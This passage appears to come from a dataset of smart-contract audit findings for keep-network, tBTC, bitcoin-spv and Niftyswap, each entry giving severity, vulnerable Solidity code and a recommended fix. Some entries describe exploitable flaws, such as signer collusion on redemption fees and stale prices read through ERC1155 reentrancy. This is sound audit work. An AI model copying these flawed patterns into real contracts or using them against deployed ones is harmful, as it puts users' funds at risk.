Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\nчRequire that `minimumStake` has been provided and can be seized/slashed. Update the documentation to reflect the fact that the solution always seizes/slashes `minimumStake`. Ensure that stakers cannot cancel their stake while they are actively participating in the network.чч```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. 
The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n -keep-tecdsa - Change state-mutability of checkSignatureFraud to viewчlowч```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, \"Public key was not set yet\");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n \"Signed digest does not match double sha256 hash of the preimage\"\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n \"Signature is not fraudulent\"\\n );\\n\\n return true;\\n}\\n```\\nчDeclare method as `view`. 
Consider renaming `submitSignatureFraud` to e.g. `checkSignatureFraud` to emphasize that it is only checking the signature and not actually changing state.чч```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, \"Public key was not set yet\");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n \"Signed digest does not match double sha256 hash of the preimage\"\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n \"Signature is not fraudulent\"\\n );\\n\\n return true;\\n}\\n```\\n -keep-core - Specification inconsistency: TokenStaking.slash() is never calledчlowчAccording to the keep specification stake should be slashed if a staker violates the protocol:\\nSlashing If a staker violates the protocol of an operation in a way which can be proven on-chain, they will be penalized by having their stakes slashed.\\nWhile this functionality can only be called by the approved operator contract, it is not being used throughout the system. 
In contrast `seize()` is being called when reporting unauthorized signing or relay entry timeout.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\nчImplement slashing according to the specification.чч```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], \"Not authorized\");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n -tbtc - Remove notifyDepositExpiryCourtesyCall and allow exitCourtesyCall exiting the courtesy call at termчlowчFollowing a deep dive into state transitions with the client it was agreed that `notifyDepositExpiryCourtesyCall` should be removed from the system as it is a left-over of a previous version of the deposit 
contract.\\nAdditionally, `exitCourtesyCall` should be callable at any time.\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\nчRemove the `notifyDepositExpiryCourtesyCall` state transition and remove the requirement on `exitCourtesyCall` being callable only before the deposit expires.чч```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), \"Not currently in courtesy call\");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), \"Deposit is expiring\");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, \"Deposit is still undercollateralized\");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n -keep-tecdsa - withdraw should check for zero value transferчlowчRequesting the withdrawal of zero `ETH` in `KeepBonding.withdraw` should fail as this would allow the method to succeed, calling the user-provided destination even though the sender has no unbonded value.\\n```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n \"Insufficient unbonded value\"\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool 
success, ) = destination.call.value(amount)(\"\");\\n require(success, \"Transfer failed\");\\n}\\n```\\n\\nAnd a similar instance in BondedECDSAKeep:\\n```\\n/// @notice Withdraws amount of ether hold in the keep for the member.\\n/// The value is sent to the beneficiary of the specific member.\\n/// @param \\_member Keep member address.\\nfunction withdraw(address \\_member) external {\\n uint256 value = memberETHBalances[\\_member];\\n memberETHBalances[\\_member] = 0;\\n\\n /\\* solium-disable-next-line security/no-call-value \\*/\\n (bool success, ) = tokenStaking.magpieOf(\\_member).call.value(value)(\"\");\\n\\n require(success, \"Transfer failed\");\\n}\\n```\\nчRequire that the amount to be withdrawn is greater than zero.чч```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n \"Insufficient unbonded value\"\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)(\"\");\\n require(success, \"Transfer failed\");\\n}\\n```\\n -tbtc - Signer collusion may bypass increaseRedemptionFee flowчlowчDepositRedemption.increaseRedemptionFee is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, \"Not an allowed fee 
step\");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`.\\nRather than calling `increaseRedemptionFee` 5 times over 20 hours, colluding signers may immediately create and sign a transaction with a fee of `initialRedemptionFee * 5`, wait for it to be mined, then submit it to `provideRedemptionProof`. Because `provideRedemptionProof` does not check that a transaction signature signs an approved digest, interested parties would need to monitor the bitcoin blockchain, notice the spend, and provide an ECDSA fraud proof before `provideRedemptionProof` is called.чResolution\\nIssue addressed in keep-network/tbtc#522\\nTrack the latest approved fee, and ensure the transaction in `provideRedemptionProof` does not include a higher fee.чч```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n -tbtc - liquidating a deposit does not send the complete remainder of the contract balance to recipientsчlowч`purchaseSignerBondsAtAuction` might leave a wei in the contract if:\\nthere is only one wei remaining in the contract\\nthere is more than one wei remaining but the contract balance is odd.\\ncontract balances must be > 1 wei otherwise no transfer is attempted\\nthe division at line 271 floors the result if dividing an odd balance. 
The contract is sending `floor(contract.balance / 2)` to the keep group and liquidationInitiator leaving one 1 in the contract.\\n```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\nчDefine a reasonable minimum amount when awarding the fraud reporter or liquidation initiator. Alternatively, always transfer the contract balance. When splitting the amount use the contract balance after the first transfer as the value being sent to the second recipient. Use the presence of locked funds in a contract as an error indicator unless funds were sent forcefully to the contract.чч```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n -tbtc - approveAndCall unused return parameterчlowч`approveAndCall` always returns false because the return value `bool success` is never set.\\n```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, 
\\_tdtId, address(this), \\_extraData);\\n}\\n```\\nчReturn the correct success state.чч```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n -bitcoin-spv - Unnecessary memory allocation in BTCUtils Pendingчlowч`BTCUtils` makes liberal use of `BytesLib.slice`, which returns a freshly-allocated slice of an existing bytes array. In many cases, the desired behavior is simply to read a 32-byte slice of a byte array. As a result, the typical pattern used is: `bytesVar.slice(start, start + 32).toBytes32()`.\\nThis pattern introduces unnecessary complexity and memory allocation in a critically important library: cloning a portion of the array, storing that clone in memory, and then reading it from memory. 
A simpler alternative would be to implement `BytesLib.readBytes32(bytes _b, uint _idx)` and other “memory-read” functions.\\nRather than moving the free memory pointer and redundantly reading, storing, then re-reading memory, `readBytes32` and similar functions would perform a simple length check and `mload` directly from the desired index in the array.\\nextractInputTxIdLE:\\n```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n\\nverifyHash256Merkle:\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx >> 1;\\n}\\nreturn \\_current == \\_root;\\n```\\nчImplement `BytesLib.readBytes32` and favor its use over the `bytesVar.slice(start, start + 32).toBytes32()` pattern. 
Implement other memory-read functions where possible, and avoid the use of `slice`.\\nNote, too, that implementing this change in `verifyHash256Merkle` would allow `_hash256MerkleStep` to accept 2 `bytes32` inputs (rather than bytes), removing additional unnecessary casting and memory allocation.чч```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n -bitcoin-spv - ValidateSPV.validateHeaderChain does not completely validate input Won't Fixчlowч`ValidateSPV.validateHeaderChain` takes as input a sequence of Bitcoin headers and calculates the total accumulated difficulty across the entire sequence. The input headers are checked to ensure they are relatively well-formed:\\n```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n\\nHowever, the function lacks a check for nonzero length of `_headers`. Although the total difficulty returned would be zero, an explicit check would make this more clear.чIf `headers.length` is zero, return `ERR_BAD_LENGTH`чч```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n -bitcoin-spv - unnecessary intermediate castчlowч`CheckBitcoinSigs.accountFromPubkey()` casts the `bytes32` keccack256 hash of the `pubkey` to `uint256`, then `uint160` and then finally to `address` while the intermediate cast is not required.\\n```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. 
Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, \"Pubkey must be 64-byte raw, uncompressed key.\");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\nчThe intermediate cast from `uint256` to `uint160` can be omitted. Refactor to `return address(uint256(_digest))` instead.чч```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, \"Pubkey must be 64-byte raw, uncompressed key.\");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n -bitcoin-spv - unnecessary logic in BytesLib.toBytes32()чlowчThe heavily used library function `BytesLib.toBytes32()` unnecessarily casts `_source` to `bytes` (same type) and creates a copy of the dynamic byte array to check it's length, while this can be done directly on the user-provided `bytes` `_source`.\\n```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\nч```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n if (\\_source.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n }\\n```\\nчч```\\nfunction toBytes32(bytes memory \\_source) pure internal returns 
(bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n -bitcoin-spv - redundant functionality Won't FixчlowчThe library exposes redundant implementations of bitcoins double `sha256`.\\nsolidity native implementation with an overzealous type correction issue 5.45\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n\\nassembly implementation\\nNote this implementation does not handle errors when staticcall'ing the precompiled `sha256` contract (private chains).\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev sha2 is precompiled smart contract located at address(2)\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256View(bytes memory \\_b) internal view returns (bytes32 res) {\\n assembly {\\n let ptr := mload(0x40)\\n pop(staticcall(gas, 2, add(\\_b, 32), mload(\\_b), ptr, 32))\\n pop(staticcall(gas, 2, ptr, 32, ptr, 32))\\n res := mload(ptr)\\n }\\n}\\n```\\nчWe recommend providing only one implementation for calculating the double `sha256` as maintaining two interfaces for the same functionality is not desirable. 
Furthermore, even though the assembly implementation is saving gas, we recommend keeping the language provided implementation.чч```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n -bitcoin-spv - unnecessary type correctionчlowчThe type correction `encodePacked().toBytes32()` is not needed as `sha256` already returns `bytes32`.\\n```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\nчRefactor to `return sha256(abi.encodePacked(sha256(_b)));` to save gas.чч```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n -tbtc - Where possible, a specific contract type should be used rather than addressчlowчRather than storing addresses and then casting to the known contract type, it's better to use the best type available so the compiler can check for type safety.\\n`TBTCSystem.priceFeed` is of type `address`, but it could be type `IBTCETHPriceFeed` instead. 
Not only would this give a little more type safety when deploying new modules, but it would avoid repeated casts throughout the codebase of the form `IBTCETHPriceFeed(priceFeed)`, `IRelay(relay)`, `TBTCSystem()`, and others.\\n```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n\\n```\\ncontract DepositFactory is CloneFactory, TBTCSystemAuthority{\\n\\n // Holds the address of the deposit contract\\n // which will be used as a master contract for cloning.\\n address public masterDepositAddress;\\n address public tbtcSystem;\\n address public tbtcToken;\\n address public tbtcDepositToken;\\n address public feeRebateToken;\\n address public vendingMachine;\\n uint256 public keepThreshold;\\n uint256 public keepSize;\\n```\\n\\nRemediation\\nWhere possible, use more specific types instead of `address`. This goes for parameter types as well as state variable types.чResolution\\nThis issue has been addressed with https://github.com/keep-network/tbtc/issues/507 and keep-network/tbtc#542.чч```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n -tbtc - Variable shadowing in DepositFactoryчlowч`DepositFactory` inherits from `TBTCSystemAuthority`. 
Both contracts declare a state variable with the same name, `tbtcSystem`.\\n```\\naddress public tbtcSystem;\\n```\\nчRemove the shadowed variable.чч```\\naddress public tbtcSystem;\\n```\\n -tbtc - Values may contain dirty lower-order bits Pendingчlowч`FundingScript` and `RedemptionScript` use `mload` to cast the first bytes of a byte array to `bytes4`. Because `mload` deals with 32-byte chunks, the resulting `bytes4` value may contain dirty lower-order bits.\\nFundingScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n \"Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.\"\\n);\\n```\\n\\nRedemptionScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to tbtcToBtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.tbtcToBtc.selector,\\n \"Bad \\_extraData signature. Call must be to tbtcToBtc.\"\\n);\\n```\\nчSolidity truncates these unneeded bytes in the subsequent comparison operations, so there is no action required. However, this is good to keep in mind if these values are ever used for anything outside of strict comparison.чч```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n \"Bad \\_extraData signature. 
Call must be to unqualifiedDepositToTbtc.\"\\n);\\n```\\n -tbtc - Revert error string may be malformed Pendingчlowч`FundingScript` handles an error from a call to `VendingMachine` like so.\\n```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n\\nOn a high-level revert, `returnData` will already include the typical “error selector”. As `FundingScript` propagates this error message, it will add another error selector, which may make it difficult to read the error message.\\nThe same issue is present in RedemptionScript:\\n```\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\_extraData);\\n// By default, `address.call` will catch any revert messages.\\n// Converting the `returnData` to a string will effectively forward any revert messages.\\n// https://ethereum.stackexchange.com/questions/69133/forward-revert-message-from-low-level-solidity-call\\n// TODO: there's some noisy couple bytes at the beginning of the converted string, maybe the ABI-coded length?\\nrequire(success, string(returnData));\\n```\\nчRather than adding an assembly-level revert to the affected contracts, ensure nested error selectors are handled in external libraries.чч```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n -tbtc - Where possible, use constant rather than state variablesчlowч`TBTCSystem` uses a state variable for `pausedDuration`, but this value is never changed.\\n```\\nuint256 pausedDuration = 10 days;\\n```\\nчConsider using the 
`constant` keyword.чч```\\nuint256 pausedDuration = 10 days;\\n```\\n -tbtc - Variable shadowing in TBTCDepositToken constructorчlowч`TBTCDepositToken` inherits from `DepositFactoryAuthority`, which has a single state variable, `_depositFactory`. This variable is shadowed in the `TBTCDepositToken` constructor.\\n```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(\"tBTC Deopsit Token\", \"TDT\")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\nчRename the parameter or state variable.чч```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(\"tBTC Deopsit Token\", \"TDT\")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n -Incorrect response from price feed if called during an onERC1155Received callback AcknowledgedчmediumчThe ERC 1155 standard requires that smart contracts must implement `onERC1155Received` and `onERC1155BatchReceived` to accept transfers.\\nThis means that on any token received, code run on the receiving smart contract.\\nIn `NiftyswapExchange` when adding / removing liquidity or buying tokens, the methods mentioned above are called when the tokens are sent. 
When this happens, the state of the contract is changed but not completed, the tokens are sent to the receiving smart contract but the state is not completely updated.\\nThis happens in these cases\\n`_baseToToken` (when buying tokens)\\n```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, \"\");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, \"\");\\n```\\n\\n`_removeLiquidity`\\n```\\n// Transfer total Base Tokens and all Tokens ids\\nbaseToken.safeTransferFrom(address(this), \\_provider, baseTokenID, totalBaseTokens, \"\");\\ntoken.safeBatchTransferFrom(address(this), \\_provider, \\_tokenIds, tokenAmounts, \"\");\\n```\\n\\n`_addLiquidity`\\n```\\n// Mint liquidity pool tokens\\n\\_batchMint(\\_provider, \\_tokenIds, liquiditiesToMint, \"\");\\n\\n// Transfer all Base Tokens to this contract\\nbaseToken.safeTransferFrom(\\_provider, address(this), baseTokenID, totalBaseTokens, abi.encode(DEPOSIT\\_SIG));\\n```\\n\\nEach of these examples sends some tokens to the smart contract, which triggers calling some code on the receiving smart contract.\\nWhile these methods have the `nonReentrant` modifier which protects them from re-entrancy, the result of the methods `getPrice_baseToToken` and `getPrice_tokenToBase` is affected. These 2 methods do not have the `nonReentrant` modifier.\\nThe price reported by the `getPrice_baseToToken` and `getPrice_tokenToBase` methods is incorrect (until after the end of the transaction) because they rely on the number of tokens owned by the NiftyswapExchange; which between the calls is not finalized. 
Hence the price reported will be incorrect.\\nThis gives the smart contract which receives the tokens, the opportunity to use other systems (if they exist) that rely on the result of `getPrice_baseToToken` and `getPrice_tokenToBase` to use the returned price to its advantage.\\nIt's important to note that this is a bug only if other systems rely on the price reported by this `NiftyswapExchange`. Also the current contract is not affected, nor its balances or internal ledger, only other systems relying on its reported price will be fooled.чResolution\\nThe design will not be modified. Horizon Games should clearly document this risk for 3rd parties seeking to use Niftyswap as a price feed.\\nBecause there is no way to enforce how other systems work, a restriction can be added on `NiftyswapExchange` to protect other systems (if any) that rely on `NiftyswapExchange` for price discovery.\\nAdding a `nonReentrant` modifier on the view methods `getPrice_baseToToken` and `getPrice_tokenToBase` will add a bit of protection for the ecosystem.чч```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, \"\");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, \"\");\\n```\\n -Ether send function remainder handlingчlowчThe Ether send function depicted below implements logic to reimburse the sender if an extraneous amount is left in the contract after the disbursement.\\n```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns 